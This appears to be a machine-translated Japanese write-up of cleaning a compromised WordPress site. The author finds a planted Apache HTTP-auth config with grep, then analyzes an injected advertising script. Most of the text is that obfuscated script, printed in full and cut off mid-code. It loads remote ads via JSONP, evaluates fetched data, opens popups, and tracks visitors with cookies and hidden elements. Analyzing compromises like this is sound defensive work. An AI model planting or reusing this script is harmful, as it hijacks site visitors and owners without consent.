最近、同僚とWordPressサイトをハッキングする状況に遭遇しました。 いらいらするコーナーに広告が表示され、実際に本格的な作業を妨害しました。 また、WordPress管理パネルにアクセスできませんでした。HTTP認証がありました。 まず、このHTTP承認を削除し、管理パネルにアクセスすることが決定されました。 リエンジニアリングプロセスがどのように行われたかに興味がある場合は、猫をお願いします。
2つのオプションが提案されました。ヘッダーを実行する悪意のあるスクリプトがwp-login.phpで実行されるか( 'WWW-Authenticate')、または左側の.htaccessがどこかに現れました。 2番目のオプションを後のために延期しました。 VDSをハッキングするということです。 したがって、この有害なヘッダーを探し始めました。 sshを介してサーバーにログインした後、「header( 'WWW」というリクエストにより、プロジェクト構造内で一致する可能性のあるものをすべて探し始めました。
grep -rwl header('WWW /var/www/mysite.com.ua
結果はすぐに現れ、一致するものは1つしか見つかりませんでしたので、すぐにwp-app.phpファイルを開いてこのヘッダーを分析しました。 彼が管理パネルへの入り口をブロックすることによって呼び出される可能性があります。 しかし、これは誤った仮定であることが判明し、コードは問題なく、純粋なWordPressのコードと完全に一致していました。
2番目のオプションは.htaccessのままです。 そして、私が最初に探し始めたのはAuthTypeでした。 しかし、彼はどこにいるのでしょうか? お気に入りのgrepを再度実行します。
grep -rwl AuthType /var/www/mysite.com.ua
その結果、何も得られませんでした。 絶対に。 しかし、どこかで彼はつながります。 次に、Apacheの設定で最悪のオプションはconf.dであることを提案しました。
grep -rwl AuthType /etc/apache2/
そして、ここにあります-wp-login.confファイル。 管理パネルのHTTP認証用に設定されたルール。 このファイルを削除し、Apacheを再起動して、管理パネルにアクセスします。 パスワードは変更されていないため、管理パネルへの入り口に問題はありません。
1つの問題が解決されました。 しかし、スクリプトをドキュメント本文に接続することにはまだ問題があります。 元のフッターの直後のドキュメントフッターに厳密に接続します。 したがって、これと同じまたは同じコマンドを探すことは理にかなっています。
echo "Evil Script";
検索は何も返しませんでした。 Meldなどの優れたユーティリティを使用して、サイトの現在のバージョンとそのバックアップの間でディレクトリを再帰的に比較することを決定しました。 しかし、ここでは失望しました-差分はきれいで、実行のヒントもインラインスクリプトもありませんでした。 しかし、スクリプトは接続されています。 次に、どこで、どのように?
そもそも接続するスクリプトを分析し始めました。 PhpStormを開いて、新しいJSファイルを作成しました。 スクリプトの本文をコピーして、再フォーマットコードを実行しました。 ネタバレの下での結果:
var s = void 0, y = !0, z = null, T = !1; (function (r, k, xb) { function bb(a) { return/[\\\"<>\.;]/.exec(a) != z && typeof encodeURIComponent != t ? encodeURIComponent(a) : a } function U(a, b) { if (cb) { var c = b ? "visible" : "hidden"; V && J(a) ? J(a).style.visibility = c : db("#" + a, "visibility:" + c) } } function db(a, b, c, d) { if (!nc || !nR) { var e = u.getElementsByTagName("head")[0]; if (e) { c = c && "string" == typeof c ? c : "screen"; d && (Da = L = z); if (!L || Da != c)d = u.createElement("style"), d.setAttribute("type", "text/css"), d.setAttribute("media", c), L = e.appendChild(d), nc && (ne && typeof u.styleSheets != t && 0 < u.styleSheets.length) && (L = u.styleSheets[u.styleSheets.length - 1]), Da = c; nc && ne ? L && typeof L.addRule == M && L.addRule(a, b) : L && typeof u.createTextNode != t && L.appendChild(u.createTextNode(a + " {" + b + "}")) } } } function la(a) { var b = nn; a = a.split("."); a[0] = parseInt(a[0], 10); a[1] = parseInt(a[1], 10) || 0; a[2] = parseInt(a[2], 10) || 0; return b[0] > a[0] || b[0] == a[0] && b[1] > a[1] || b[0] == a[0] && b[1] == a[1] && b[2] >= a[2] ? y : T } function J(a) { var b = z; try { b = u.getElementById(a) } catch (c) { } return b } function eb(a) { var b = J(a); b && "OBJECT" == b.nodeName && (nc && ne ? (b.style.display = "none", function () { if (4 == b.readyState) { var c = J(a); if (c) { for (var d in c)"function" == typeof c[d] && (c[d] = z); c.parentNode.removeChild(c) } } else setTimeout(arguments.callee, 10) }()) : b.parentNode.removeChild(b)) } function Ea(a, b, c) { var d, e = J(c); if (ni && 312 > ni)return d; if (e)if (typeof a.id == t && (a.id = c), nc && ne) { var f = "", p; for (p in a)a[p] != Object.prototype[p] && ("data" == p.toLowerCase() ? b.movie = a[p] : "styleclass" == p.toLowerCase() ? f += ' class\x3d"' + a[p] + '"' : "classid" != p.toLowerCase() && (f += " " + p + '\x3d"' + a[p] + '"')); p = ""; for (var h in b)b[h] != Object.prototype[h] && (p += '\x3cparam name\x3d"' + h + '" value\x3d"' + b[h] + '" /\x3e'); e.outerHTML = '\x3cobject classid\x3d"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' + f + "\x3e" + p + "\x3c/object\x3e"; ma[ma.length] = a.id; d = J(a.id) } else { h = u.createElement(M); h.setAttribute("type", na); for (var j in a)a[j] != Object.prototype[j] && ("styleclass" == j.toLowerCase() ? h.setAttribute("class", a[j]) : "classid" != j.toLowerCase() && h.setAttribute(j, a[j])); for (f in b)b[f] != Object.prototype[f] && "movie" != f.toLowerCase() && (a = h, p = f, j = b[f], c = u.createElement("param"), c.setAttribute("name", p), c.setAttribute("value", j), a.appendChild(c)); e.parentNode.replaceChild(h, e); d = h } return d } function Fa(a) { var b = u.createElement("div"); if (ne && nc)b.innerHTML = a.innerHTML; else if (a = a.getElementsByTagName(M)[0])if (a = a.childNodes)for (var c = a.length, d = 0; d < c; d++)!(1 == a[d].nodeType && "PARAM" == a[d].nodeName) && 8 != a[d].nodeType && b.appendChild(a[d].cloneNode(y)); return b } function yb(a) { if (nc && ne && 4 != a.readyState) { var b = u.createElement("div"); a.parentNode.insertBefore(b, a); b.parentNode.replaceChild(Fa(a), b); a.style.display = "none"; (function () { 4 == a.readyState ? a.parentNode.removeChild(a) : setTimeout(arguments.callee, 10) })() } else a.parentNode.replaceChild(Fa(a), a) } function Ga(a, b, c, d) { oa = y; Ha = d || z; fb = {success: T, id: c}; var e = J(c); if (e) { "OBJECT" == e.nodeName ? (ea = Fa(e), pa = z) : (ea = e, pa = c); a.id = gb; if (typeof a.width == t || !/%$/.test(a.width) && 310 > parseInt(a.width, 10))a.width = "310"; if (typeof a.height == t || !/%$/.test(a.height) && 137 > parseInt(a.height, 10))a.height = "137"; u.title = u.title.slice(0, 47) + " - Flash Player Installation"; d = nc && ne ? "ActiveX" : "PlugIn"; d = "MMredirectURL\x3d" + G.location.toString().replace(/&/g, "%26") + "\x26MMplayerType\x3d" + d + "\x26MMdoctitle\x3d" + u.title; bs = typeof bs != t ? bs + ("\x26" + d) : d; nc && (ne && 4 != e.readyState) && (d = u.createElement("div"), c += "SWFObjectNew", d.setAttribute("id", c), e.parentNode.insertBefore(d, e), e.style.display = "none", function () { 4 == e.readyState ? e.parentNode.removeChild(e) : setTimeout(arguments.callee, 10) }()); Ea(a, b, c) } } function Ia() { return!oa && la("6.0.65") && (ne || nR) && !(ni && 312 > ni) } function Ja(a) { var b = z; if ((a = J(a)) && "OBJECT" == a.nodeName)typeof a.SetVariable != t ? b = a : (a = a.getElementsByTagName(M)[0]) && (b = a); return b } function Ka() { var a = P.length; if (0 < a)for (var b = 0; b < a; b++) { var c = P[b].id, d = P[b].fa, e = {success: T, id: c}; if (0 < nn[0]) { var f = J(c); if (f)if (la(P[b].qa) && !(ni && 312 > ni))U(c, y), d && (e.success = y, eS = Ja(c), d(e)); else if (P[b].O && Ia()) { e = {}; e.data = P[b].O; e.width = f.getAttribute("width") || "0"; e.height = f.getAttribute("height") || "0"; f.getAttribute("class") && (e.jb = f.getAttribute("class")); f.getAttribute("align") && (e.align = f.getAttribute("align")); for (var p = {}, f = f.getElementsByTagName("param"), h = f.length, j = 0; j < h; j++)"movie" != f[j].getAttribute("name").toLowerCase() && (p[f[j].getAttribute("name")] = f[j].getAttribute("value")); Ga(e, p, c, d) } else yb(f), d && d(e) } else if (U(c, y), d) { if ((c = Ja(c)) && typeof c.SetVariable != t)e.success = y, eS = c; d(e) } } } function hb(a) { if (typeof G.addEventListener != t)G.addEventListener("load", a, T); else if (typeof u.addEventListener != t)u.addEventListener("load", a, T); else if (typeof G.attachEvent != t) { var b = G; b.attachEvent("onload", a); Y[Y.length] = [b, "onload", a] } else if ("function" == typeof G.onload) { var c = G.onload; G.onload = function () { c(); a() } } else G.onload = a } function ib(a) { V ? a() : qa[qa.length] = a } function Z() { if (!V) { try { var a = u.getElementsByTagName("body")[0].appendChild(u.createElement("span")); a.parentNode.removeChild(a) } catch (b) { return } V = y; for (var a = qa.length, c = 0; c < a; c++)qa[c]() } } function jb(a) { return/[\\\"<>\.;]/.exec(a) != z && typeof encodeURIComponent != v ? encodeURIComponent(a) : a } function W(a, b) { if (kb) { var c = b ? "visible" : "hidden"; X && K(a) ? K(a).style.visibility = c : lb("#" + a, "visibility:" + c) } } function lb(a, b, c, d) { if (!mc || !mR) { var e = l.getElementsByTagName("head")[0]; if (e) { c = c && "string" == typeof c ? c : "screen"; d && (La = N = z); if (!N || La != c)d = l.createElement("style"), d.setAttribute("type", "text/css"), d.setAttribute("media", c), N = e.appendChild(d), mc && (me && typeof l.styleSheets != v && 0 < l.styleSheets.length) && (N = l.styleSheets[l.styleSheets.length - 1]), La = c; mc && me ? N && typeof N.addRule == O && N.addRule(a, b) : N && typeof l.createTextNode != v && N.appendChild(l.createTextNode(a + " {" + b + "}")) } } } function ra(a) { var b = mn; a = a.split("."); a[0] = parseInt(a[0], 10); a[1] = parseInt(a[1], 10) || 0; a[2] = parseInt(a[2], 10) || 0; return b[0] > a[0] || b[0] == a[0] && b[1] > a[1] || b[0] == a[0] && b[1] == a[1] && b[2] >= a[2] ? y : T } function K(a) { var b = z; try { b = l.getElementById(a) } catch (c) { } return b } function mb(a) { var b = K(a); b && "OBJECT" == b.nodeName && (mc && me ? (b.style.display = "none", function () { if (4 == b.readyState) { var c = K(a); if (c) { for (var d in c)"function" == typeof c[d] && (c[d] = z); c.parentNode.removeChild(c) } } else setTimeout(arguments.callee, 10) }()) : b.parentNode.removeChild(b)) } function Ma(a, b, c) { var d, e = K(c); if (mi && 312 > mi)return d; if (e)if (typeof a.id == v && (a.id = c), mc && me) { var f = "", p; for (p in a)a[p] != Object.prototype[p] && ("data" == p.toLowerCase() ? b.movie = a[p] : "styleclass" == p.toLowerCase() ? f += ' class\x3d"' + a[p] + '"' : "classid" != p.toLowerCase() && (f += " " + p + '\x3d"' + a[p] + '"')); p = ""; for (var h in b)b[h] != Object.prototype[h] && (p += '\x3cparam name\x3d"' + h + '" value\x3d"' + b[h] + '" /\x3e'); e.outerHTML = '\x3cobject classid\x3d"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' + f + "\x3e" + p + "\x3c/object\x3e"; sa[sa.length] = a.id; d = K(a.id) } else { h = l.createElement(O); h.setAttribute("type", ta); for (var j in a)a[j] != Object.prototype[j] && ("styleclass" == j.toLowerCase() ? h.setAttribute("class", a[j]) : "classid" != j.toLowerCase() && h.setAttribute(j, a[j])); for (f in b)b[f] != Object.prototype[f] && "movie" != f.toLowerCase() && (a = h, p = f, j = b[f], c = l.createElement("param"), c.setAttribute("name", p), c.setAttribute("value", j), a.appendChild(c)); e.parentNode.replaceChild(h, e); d = h } return d } function Na(a) { var b = l.createElement("div"); if (me && mc)b.innerHTML = a.innerHTML; else if (a = a.getElementsByTagName(O)[0])if (a = a.childNodes)for (var c = a.length, d = 0; d < c; d++)!(1 == a[d].nodeType && "PARAM" == a[d].nodeName) && 8 != a[d].nodeType && b.appendChild(a[d].cloneNode(y)); return b } function zb(a) { if (mc && me && 4 != a.readyState) { var b = l.createElement("div"); a.parentNode.insertBefore(b, a); b.parentNode.replaceChild(Na(a), b); a.style.display = "none"; (function () { 4 == a.readyState ? a.parentNode.removeChild(a) : setTimeout(arguments.callee, 10) })() } else a.parentNode.replaceChild(Na(a), a) } function Oa(a, b, c, d) { ua = y; Pa = d || z; nb = {success: T, id: c}; var e = K(c); if (e) { "OBJECT" == e.nodeName ? (fa = Na(e), va = z) : (fa = e, va = c); a.id = ob; if (typeof a.width == v || !/%$/.test(a.width) && 310 > parseInt(a.width, 10))a.width = "310"; if (typeof a.height == v || !/%$/.test(a.height) && 137 > parseInt(a.height, 10))a.height = "137"; l.title = l.title.slice(0, 47) + " - Flash Player Installation"; d = mc && me ? "ActiveX" : "PlugIn"; d = "MMredirectURL\x3d" + H.location.toString().replace(/&/g, "%26") + "\x26MMplayerType\x3d" + d + "\x26MMdoctitle\x3d" + l.title; bs = typeof bs != v ? bs + ("\x26" + d) : d; mc && (me && 4 != e.readyState) && (d = l.createElement("div"), c += "SWFObjectNew", d.setAttribute("id", c), e.parentNode.insertBefore(d, e), e.style.display = "none", function () { 4 == e.readyState ? e.parentNode.removeChild(e) : setTimeout(arguments.callee, 10) }()); Ma(a, b, c) } } function Qa() { return!ua && ra("6.0.65") && (me || mR) && !(mi && 312 > mi) } function Ra(a) { var b = z; if ((a = K(a)) && "OBJECT" == a.nodeName)typeof a.SetVariable != v ? b = a : (a = a.getElementsByTagName(O)[0]) && (b = a); return b } function Sa() { var a = Q.length; if (0 < a)for (var b = 0; b < a; b++) { var c = Q[b].id, d = Q[b].fa, e = {success: T, id: c}; if (0 < mn[0]) { var f = K(c); if (f)if (ra(Q[b].qa) && !(mi && 312 > mi))W(c, y), d && (e.success = y, eS = Ra(c), d(e)); else if (Q[b].O && Qa()) { e = {}; e.data = Q[b].O; e.width = f.getAttribute("width") || "0"; e.height = f.getAttribute("height") || "0"; f.getAttribute("class") && (e.jb = f.getAttribute("class")); f.getAttribute("align") && (e.align = f.getAttribute("align")); for (var p = {}, f = f.getElementsByTagName("param"), h = f.length, j = 0; j < h; j++)"movie" != f[j].getAttribute("name").toLowerCase() && (p[f[j].getAttribute("name")] = f[j].getAttribute("value")); Oa(e, p, c, d) } else zb(f), d && d(e) } else if (W(c, y), d) { if ((c = Ra(c)) && typeof c.SetVariable != v)e.success = y, eS = c; d(e) } } } function pb(a) { if (typeof H.addEventListener != v)H.addEventListener("load", a, T); else if (typeof l.addEventListener != v)l.addEventListener("load", a, T); else if (typeof H.attachEvent != v) { var b = H; b.attachEvent("onload", a); aa[aa.length] = [b, "onload", a] } else if ("function" == typeof H.onload) { var c = H.onload; H.onload = function () { c(); a() } } else H.onload = a } function qb(a) { X ? a() : wa[wa.length] = a } function ba() { if (!X) { try { var a = l.getElementsByTagName("body")[0].appendChild(l.createElement("span")); a.parentNode.removeChild(a) } catch (b) { return } X = y; for (var a = wa.length, c = 0; c < a; c++)wa[c]() } } function E(a, b) { function c() { } c.prototype = b.prototype; a.prototype = new c; a.prototype.constructor = a; a.nb = b.prototype; b.prototype.constructor == Object.prototype.constructor && (b.prototype.constructor = b) } function rb(a) { this.a = g.parseJSON(gL(a)); r.globalInfo = {}; g.log(this.a); if (this.a.ukDomain && this.a.ukUri && !r.udata && !this.a.dontGoToUK) { var b = this, c = setTimeout(function () { b.oa() }, 5E3); g.da(this.a.ukDomain, this.a.ukUri, function (a) { clearTimeout(c); g.parseJSON(gL(a)); r.globalInfo.udata = a; b.oa() }, "jsf") } else this.a.foreignUid || this.Ba(this.a.matchingUrl), this.oa() } function sb() { } function I() { } function xa() { } function Ta() { } function Ua() { } function Va() { } function ca() { } function Wa() { } function ya() { } function Xa() { } function Ya() { } function da() { } function ga() { } function Za() { } var v = "undefined", O = "object", ta = "application/x-shockwave-flash", ob = "SWFObjectExprInst", H = r, l = k, R = navigator, tb = T, wa = [function () { if (tb) { var a = l.getElementsByTagName("body")[0], b = l.createElement(O); b.setAttribute("type", ta); var c = a.appendChild(b); if (c) { var d = 0; (function () { if (typeof c.GetVariable != v) { var e = c.GetVariable("$version"); e && (e = e.split(" ")[1].split(","), mn = [parseInt(e[0], 10), parseInt(e[1], 10), parseInt(e[2], 10)]) } else if (10 > d) { d++; setTimeout(arguments.callee, 10); return } a.removeChild(b); c = z; Sa() })() } else Sa() } else Sa() }], Q = [], sa = [], aa = [], fa, va, Pa, nb, X = T, ua = T, N, La, kb = y, m, Ab = typeof l.getElementById != v && typeof l.getElementsByTagName != v && typeof l.createElement != v, za = R.userAgent.toLowerCase(), Aa = R.platform.toLowerCase(), Bb = Aa ? /win/.test(Aa) : /win/.test(za), Cb = Aa ? /mac/.test(Aa) : /mac/.test(za), Db = /webkit/.test(za) ? parseFloat(za.replace(/^.*webkit\/(\d+(\.\d+)?).*$/, "$1")) : T, $a = !+"\v1", ha = [0, 0, 0], C = z; if (typeof R.plugins != v && typeof R.plugins["Shockwave Flash"] == O) { if ((C = R.plugins["Shockwave Flash"].description) && !(typeof R.mimeTypes != v && R.mimeTypes[ta] && !R.mimeTypes[ta].enabledPlugin))tb = y, $a = T, C = C.replace(/^.*\s+(\S+\s+\S+$)/, "$1"), ha[0] = parseInt(C.replace(/^(.*)\..*$/, "$1"), 10), ha[1] = parseInt(C.replace(/^.*\.(.*)\s.*$/, "$1"), 10), ha[2] = /[a-zA-Z]/.test(C) ? parseInt(C.replace(/^.*[a-zA-Z]+(.*)$/, "$1"), 10) : 0 } else if (typeof H.ActiveXObject != v)try { var ub = new ActiveXObject("ShockwaveFlash.ShockwaveFlash"); if (ub && (C = ub.GetVariable("$version")))$a = y, C = C.split(" ")[1].split(","), ha = [parseInt(C[0], 10), parseInt(C[1], 10), parseInt(C[2], 10)] } catch (Ub) { } m = {j: Ab, n: ha, i: Db, c: $a, e: Bb, R: Cb}; mj && ((typeof l.readyState != v && "complete" == l.readyState || typeof l.readyState == v && (l.getElementsByTagName("body")[0] || l.body)) && ba(), X || (typeof l.addEventListener != v && l.addEventListener("DOMContentLoaded", ba, T), mc && me && (l.attachEvent("onreadystatechange", function () { "complete" == l.readyState && (l.detachEvent("onreadystatechange", arguments.callee), ba()) }), H == top && function () { if (!X) { try { l.La.doScroll("left") } catch (a) { setTimeout(arguments.callee, 0); return } ba() } }()), mi && function () { X || (/loaded|complete/.test(l.readyState) ? ba() : setTimeout(arguments.callee, 0)) }(), pb(ba))); mc && me && r.attachEvent("onunload", function () { for (var a = aa.length, b = 0; b < a; b++)aa[b][0].detachEvent(aa[b][1], aa[b][2]); a = sa.length; for (b = 0; b < a; b++)mb(sa[b]); for (var c in m)m[c] = z; m = z; for (var d in gw)gw[d] = z; gw = z }); sb.prototype = {Y: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_", U: "left:-10000px;top:-10000px;height:1px;width:1px;position:absolute;", Q: function () { return!r.addEventListener && !r.XMLHttpRequest && r.attachEvent }, v: function () { if ("BackCompat" == k.compatMode && 10 > g.Xa())return T; var a = k.createElement("div"); a.style.cssText = "position:fixed"; return a.style.position.match("fixed") ? y : T }, Ya: function (a) { a.matchUrl && (this.X(a.matchUrl).style.cssText = this.U) }, ga: function (a) { if (0 == a.limit && 0 == a.period)return y; if (this.la(a.periodName) == z) { var b = parseInt(this.la(a.limitName)); if (0 == a.limit || isNaN(b) || b < a.limit)return y } return T }, Xa: function () { var a = 999; -1 != navigator.appVersion.indexOf("MSIE") && (a = parseFloat(navigator.appVersion.split("MSIE")[1])); return a }, Ea: function (a) { var b = new Date, c = parseInt(this.la(a.limitName), 10), c = isNaN(c) ? 1 : c + 1; b.setTime(b.getTime() + 6E4 * parseInt(a.period, 10)); this.ra(a.periodName, 1, b, "/"); b.setTime(b.getTime() + 432E5); this.ra(a.limitName, c, b, "/") }, ra: function (a, b) { var c = arguments, d = c.length, e = 2 < d ? c[2] : z, f = 3 < d ? c[3] : z, p = 4 < d ? c[4] : z; k.cookie = a + "\x3d" + encodeURIComponent(b) + (e == z ? "" : "; expires\x3d" + e.toGMTString()) + (f == z ? "" : "; path\x3d" + f) + (p == z ? "" : "; domain\x3d" + p) + ((5 < d ? c[5] : T) == y ? "; secure" : "") }, pa: function () { var a, b = k.createElement("div"), c = ["Khtml", "Ms", "O", "Moz", "Webkit"], d = c.length; a = function (a) { if (a in b.style)return y; for (a = a.replace(/^[az]/, function (a) { return a.toUpperCase() }); d--;)if (c[d] + a in b.style)return y; return T }; return a("boxShadow") && a("borderRadius") }, log: function () { }, la: function (a) { var b = " " + k.cookie; a = " " + a + "\x3d"; var c = z, d = 0, e = 0; 0 < b.length && (d = b.indexOf(a), -1 != d && (d += a.length, e = -1 == b.indexOf(";", d) ? b.length : b.indexOf(";", d), c = decodeURIComponent(b.substring(d, e)))); return c }, Na: function (a, b) { var c = "", d = "", e, f, p, h, j, g = 0; b &= 255; a = this.mb(a); for (f = 0; f < a.length; d += String.fromCharCode(b ^ a.charCodeAt(f)), f++); for (a = d; g < a.length;)e = a.charCodeAt(g++), d = a.charCodeAt(g++), f = a.charCodeAt(g++), p = e >> 2, e = (e & 3) << 4 | d >> 4, h = (d & 15) << 2 | f >> 6, j = f & 63, isNaN(d) ? h = j = 64 : isNaN(f) && (j = 64), c = c + this.Y.charAt(p) + this.Y.charAt(e) + this.Y.charAt(h) + this.Y.charAt(j); return c }, L: function (a, b) { a = a.replace(/[\-]/g, "+").replace(/[_]/g, "/"); for (var c = [-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, 0, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1], d, e, f = 0, g = [], h = 0, j = 0, f = 0; f < a.length; f++)e = a.charCodeAt(f), d = c[e & 127], -1 === d ? this.log("Illegal characters (code\x3d" + e + ") in position " + f) : (j = j << 6 | d, h += 6, 8 <= h && (h -= 8, "\x3d" !== a.charAt(f) && g.push(j >> h & 255), j &= (1 << h) - 1)); if (b) { c = []; b &= 255; for (d = 0; d < g.length; c.push(b ^ g[d]), d++); g = c } return this.lb(g) }, lb: function (a) { for (var b = [], c = 0, d = a.length, e, f, g; c < d;)e = a[c], f = a[c + 1], g = a[c + 2], 128 > e ? (b.push(String.fromCharCode(e)), c += 1) : 191 < e && 224 > e ? (b.push(String.fromCharCode((e & 31) << 6 | f & 63)), c += 2) : (b.push(String.fromCharCode((e & 15) << 12 | (f & 63) << 6 | g & 63)), c += 3); return b.join("") }, mb: function (a) { a = a.replace(/\r\n/g, "\n"); for (var b = "", c = 0; c < a.length; c++) { var d = a.charCodeAt(c); 128 > d ? b += String.fromCharCode(d) : (127 < d && 2048 > d ? b += String.fromCharCode(d >> 6 | 192) : (b += String.fromCharCode(d >> 12 | 224), b += String.fromCharCode(d >> 6 & 63 | 128)), b += String.fromCharCode(d & 63 | 128)) } return b }, ma: function (a, b, c, d) { var e = navigator.userAgent.toLowerCase(); -1 != e.indexOf("safari") && -1 == e.indexOf("chrome") && (d = d || "width\x3d" + r.screen.width + ",height\x3d" + r.screen.height + ",left\x3d0,top\x3d0,menubar\x3dno,location\x3dno,resizable\x3dyes,scrollbars\x3dyes,status\x3dno"); a = r.open(a, c || "", d); b || (a.blur(), r.focus()) }, g: function (a) { var b = +new Date % 1E6; return"/?" + b + "\x3d" + this.Na(a.replace("/?", ""), b) }, w: {eb: function (a, b, c, d) { if (mj && a && b) { var e = {}; e.id = a; e.qa = b; eO = c; e.fa = d; Q[Q.length] = e; W(a, T) } else d && d({success: T, id: a}) }, Sa: function (a) { if (mj)return Ra(a) }, N: function (a, b, c, d, e, f, g, h, j, k) { var A = {success: T, id: b}; mj && !(mi && 312 > mi) && a && b && c && d && e ? (W(b, T), qb(function () { c += ""; d += ""; var q = {}; if (j && typeof j === O)for (var B in j)q[B] = j[B]; q.data = a; q.width = c; q.height = d; B = {}; if (h && typeof h === O)for (var r in h)B[r] = h[r]; if (g && typeof g === O)for (var F in g)Bs = typeof Bs != v ? Bs + ("\x26" + F + "\x3d" + g[F]) : F + "\x3d" + g[F]; if (ra(e))r = Ma(q, B, b), q.id == b && W(b, y), A.success = y, AS = r; else { if (f && Qa()) { q.data = f; Oa(q, B, b, k); return } W(b, y) } k && k(A) })) : k && k(A) }, kb: function () { kb = T }, W: m, Ra: function () { return{$a: mn[0], bb: mn[1], fb: mn[2]} }, va: ra, Ka: function (a, b, c) { if (mj)return Ma(a, b, c) }, hb: function (a, b, c, d) { mj && Qa() && Oa(a, b, c, d) }, gb: function (a) { mj && mb(a) }, Ja: function (a, b, c, d) { mj && lb(a, b, c, d) }, Fa: qb, Ha: pb, Ta: function (a) { var b = l.location.search || l.location.hash; if (b) { /\?/.test(b) && (b = b.split("?")[1]); if (a == z)return jb(b); for (var b = b.split("\x26"), c = 0; c < b.length; c++)if (b[c].substring(0, b[c].indexOf("\x3d")) == a)return jb(b[c].substring(b[c].indexOf("\x3d") + 1)) } return"" }, Pa: function () { if (ua) { var a = K(ob); a && fa && (a.parentNode.replaceChild(fa, a), va && (W(va, y), mc && me && (fa.style.display = "block")), Pa && Pa(nb)); ua = T } }}, parseJSON: function (a) { return eval("(" + a + ")") }, da: function (a, b, c, d) { d = d || "jclb"; if (c) { var e = "jsonp" + String(Math.random()).slice(4); b += "\x26" + d + "\x3dwindow." + e; r[e] = function (a) { scriptOk = y; r[e] = s; try { delete r[e] } catch (b) { } g.log("Callback called"); c(a) } } b = this.g(b); d = this.z("script"); d.src = a + b; return d }, X: function (a, b) { var c = this.z("img", b); c.src = a; return c }, Ga: function (a, b) { var c = this.z("iframe", b); c.src = a; return c }, z: function (a, b) { var c = k.createElement(a); b ? b.appendChild(c) : k.body.appendChild(c); return c }, Va: function () { var a = 0, b = 0; r.screen ? (b = r.screen.width, a = r.screen.height) : r.Za && (a = r.Za.awt.Toolkit.getDefaultToolkit().getScreenSize(), b = a.width, a = a.height); return"\x26width\x3d" + b + "\x26height\x3d" + a }, aa: function (a) { function b() { return self.innerHeight ? self.innerHeight : k.documentElement && k.documentElement.clientHeight ? k.documentElement.clientHeight : k.body ? k.body.clientHeight : 600 } function c() { var a = 0, b = 0; if ("number" == typeof r.pageYOffset)b = r.pageYOffset, a = r.pageXOffset; else if (k.body && (k.body.scrollLeft || k.body.scrollTop))b = k.body.scrollTop, a = k.body.scrollLeft; else if (k.documentElement && (k.documentElement.scrollLeft || k.documentElement.scrollTop))b = k.documentElement.scrollTop, a = k.documentElement.scrollLeft; return[a, b] } switch (a.type) { case "top": aFstyle.top = c()[1] + "px"; break; case "center": aFstyle.top = b() / 2 + c()[1] - aFoffsetHeight + "px"; break; default: aFstyle.top = b() + c()[1] - aFoffsetHeight + "px" } }, Ua: function (a) { return k.referrer && -1 == a.indexOf("\x26ref\x3d") ? "\x26ref\x3d" + encodeURIComponent(k.referrer) : "" }, Oa: function (a, b) { return-1 !== a.indexOf(b, a.length - b.length) }, k: function () { var a = (k.compatMode || this.za) && !this.ca ? "CSS1Compat" == k.compatMode ? k.documentElement.clientHeight : k.body.clientHeight : (k.cb || k.defaultView).innerHeight; g.log(a); return a }, ua: function () { return(k.compatMode || this.za) && !this.ca ? "CSS1Compat" == k.compatMode ? k.documentElement.clientWidth : k.body.clientWidth : (k.cb || k.defaultView).innerWidth }, q: function () { return Math.max(r.pageYOffset || k.documentElement.scrollTop, k.body.scrollTop) }}; rb.prototype = {a: {}, r: {}, f: z, oa: function () { function a(a) { a = g.parseJSON(gL(a)); g.log("Success RT, ", a); g.Ya(a); br = a; var c = {br: Eb, as: Fb, tl: Gb, cf: Hb, vkm: Ib, rot: Jb, popup: Kb, mppund: Lb, tsr: Mb, scr: Nb, pin: Ob, mdirect: Pb}; if (a.ads)for (var f = 0; f < a.ads.length; f++) { var p = c[a.ads[f].format]; p ? (g.log("Rendering,", a.ads[f]), pp(a.ads[f])) : g.log("Cant render ad:", a.ads[f]) } } var b = this, c = this.a.rtUri.replace("/?", ""); this.a.rotatorDomain && this.a.rtUri && g.da(this.a.rotatorDomain, this.a.rtUri + this.Wa(c) + g.Va() + g.Ua(c), a) }, Ba: function (a) { gX(a).style.cssText = "width:1px;height:1px;position:absolute;left:-10000px;" }, Wa: function (a) { var b = ""; this.a.foreignUid && (b = "\x26foreignUid\x3d" + this.a.foreignUid); return-1 == a.indexOf("\x26udata\x3d") && r.globalInfo.udata && (a = r.globalInfo.udata) ? (a = g.parseJSON(gL(a)), this.Ba(a.matchingUrl), b + "\x26udata\x3d" + a.uid) : b }}; var t = "undefined", M = "object", na = "application/x-shockwave-flash", gb = "SWFObjectExprInst", G = r, u = k, S = navigator, vb = T, qa = [function () { if (vb) { var a = u.getElementsByTagName("body")[0], b = u.createElement(M); b.setAttribute("type", na); var c = a.appendChild(b); if (c) { var d = 0; (function () { if (typeof c.GetVariable != t) { var e = c.GetVariable("$version"); e && (e = e.split(" ")[1].split(","), nn = [parseInt(e[0], 10), parseInt(e[1], 10), parseInt(e[2], 10)]) } else if (10 > d) { d++; setTimeout(arguments.callee, 10); return } a.removeChild(b); c = z; Ka() })() } else Ka() } else Ka() }], P = [], ma = [], Y = [], ea, pa, Ha, fb, V = T, oa = T, L, Da, cb = y, n, Qb = typeof u.getElementById != t && typeof u.getElementsByTagName != t && typeof u.createElement != t, Ba = S.userAgent.toLowerCase(), Ca = S.platform.toLowerCase(), Rb = Ca ? /win/.test(Ca) : /win/.test(Ba), Sb = Ca ? /mac/.test(Ca) : /mac/.test(Ba), Tb = /webkit/.test(Ba) ? parseFloat(Ba.replace(/^.*webkit\/(\d+(\.\d+)?).*$/, "$1")) : T, ab = !+"\v1", ia = [0, 0, 0], D = z; if (typeof S.plugins != t && typeof S.plugins["Shockwave Flash"] == M) { if ((D 